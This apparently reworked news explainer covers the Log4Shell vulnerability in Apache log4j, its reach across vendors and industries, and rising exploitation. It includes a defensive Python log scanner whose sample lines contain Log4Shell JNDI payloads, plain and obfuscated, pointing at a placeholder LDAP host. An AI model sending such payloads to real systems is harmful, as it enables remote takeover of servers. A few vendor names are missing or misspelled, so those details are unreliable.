Log4j: Just How Screwed Are We?

It has been a year of cyber debacles, so why not tie it all together with a big, fat security vulnerability that affects almost everything on the internet? That sounds about right.

The Apache log4j bug is bad. CISA director Jen Easterly has called it one of the most serious she has seen in her entire career. In a recent media appearance, Easterly told reporters that federal officials expect the vulnerability to be widely exploited by sophisticated actors, and her colleague Jay Gazlay, of the agency's vulnerability management office, helpfully revealed that the bug likely affects hundreds of millions of devices.

If you want to know what is going on, here is a quick rundown of the horribleness.

There is a bad bug on the web.

Apache's log4j is a free and open-source Java logging library, which is exactly why so many companies use it. Engineers use logging libraries to record how programs run; the resulting logs support code auditing and are a routine mechanism for investigating bugs. Since log4j is free and widely trusted, companies large and small have built it into their software. The irony is that the tool now has a bug of its own.

The vulnerability is called Log4Shell because a successful exploit can give the attacker shell access to the server's operating system. It has a severity rating of 10 on the Common Vulnerability Scoring System scale, which is the worst you can get. It was disclosed less than a week ago, after a member of the Cloud Security team spotted it.

The bug is a zero-day remote code execution vulnerability, which means attackers can make a targeted server download and run code of their choosing, leaving it open to complete remote control. Criminals don't have to do much to cause a lot of trouble.
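Log4Shell fires when attacker-supplied text containing a JNDI lookup gets written to a log, so the first defensive question is whether such strings are reaching your systems at all. The Python below is an added example, not code from the article or from the log4j project: a scanner over constructed web-server log lines that URL-decodes and collapses nested lookups before matching, because a plain search for `${jndi:` misses disguised probes. The IP addresses and paths are invented documentation values.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (RFC 5737 documentation addresses,
# made-up paths). Lines 2-4 carry a probe: plain, URL-encoded, and nested-lookup.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9/a}"',
    '203.0.113.8 - - [11/Dec/2021:10:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [11/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9/a}"',
]

# Innermost-first rewrites for the lookup tricks commonly used to disguise the
# string: ${lower:J} -> j, ${upper:n} -> N, ${anything:-j} -> j.
_LOWER = re.compile(r"\$\{lower:([^{}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^{}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode (twice, for double-encoded input) and collapse nested lookups."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):  # bounded so hostile input cannot loop forever
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, once de-obfuscated, contains a JNDI lookup."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, source_ip) for every line carrying a probe."""
    return [(n, line.split(" ", 1)[0])
            for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for n, ip in scan(SAMPLE_LOG):
        print(f"line {n}: Log4Shell probe from {ip}")
```

The source addresses it returns are the ones to feed into a block list or an incident ticket; the first, plain line is a clean request and is correctly ignored.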

Who is affected?

Most of the biggest platforms on the internet are tied up with log4j in some way. At this point, a comprehensive accounting seems like a quixotic ambition, as there are multiple lists that purport to show who is affected and who might be affected. According to various reports, the afflicted include big names like Apple, Amazon, and more.

Companies that have confirmed they are affected often report that a long list of products and services need patching. Cloud computing firm VMware reports that 44 of its products are affected. Thirty-five of the networking giant's tools are vulnerable. At least a dozen of Fortigard's products are affected. The list goes on.

One of the biggest companies affected is Amazon. The tech giant has been regularly publishing updates on its affected products and services, while Apple recently patched itself up after being hit by the bug. Tech giants like Dell and Citrix, as well as prominent security and software firms like SonicWall, Trend Micro, and Oracle, are still investigating whether they have been screwed.

Outside of tech, the bug has the potential to mess with industries you wouldn't normally associate with these kinds of problems. Dragos, which analyzes the security of operational and industrial control systems, recently wrote:

Electric power, water, food and beverage, manufacturing, transportation, and more are some of the industries that will be exposed to remote exploitation because of this cross-cutting vulnerability.

Incoming attacks.

That is the bad news. The good news? There is no good news. There is only more bad news, because mass exploitation attempts are already happening. Security researchers across the internet have begun to publish reports on the activity they are seeing.

Criminals appear to have learned about the log4j vuln at the same time as everyone else. Since last week, exploitation attempts against vulnerable systems and platforms have increased dramatically, as hackers throughout the web seek to take advantage of this uniquely horrible situation. Check Point recently published data showing that it had observed an explosion of exploit attempts since the initial disclosures about the bug. The report notes:

Reports on December 10th showed only a few thousand attack attempts, but by Saturday, December 11th they had risen to over 40,000. Almost 200,000 attack attempts were recorded by our sensors after the initial outbreak. 72 hours after the initial outbreak, the number hit over one million attacks.

The firm's Vice President of Threat Intelligence told Gizmodo that this kind of activity was par for the course, and that the log4j vulnerability is likely to be exploited by ransomware eventually. He said in an email that the vulnerable systems are likely to be critical assets.

Research published by Bitdefender describes a new ransomware family known as "Khonsari" that attempts to exploit vulnerable machines. According to that research, Khonsari has been targeting Microsoft systems.

Other cybersecurity professionals have written about a variety of attempted exploits, which run the gamut from botnet activity to more general scans.

These attacks are coming fast and furious, with over 1,000 attempted exploits per second being observed, and the payloads are getting more frightening. Matthew Prince, the CEO of Cloudflare, said that ransomware payloads started in force in the last 24 hours.

This week, a second vulnerability was discovered. Apache has already released a further update after researchers at LunaSec said that systems patched for the first bug could still run afoul of the new one.

If you are a casual web user, the only thing you can do is update your devices and applications when prompted and hope that the platforms you rely on are swift enough to identify the vulnerabilities, conjure up patches, and push out updates. Hang in there, everyone.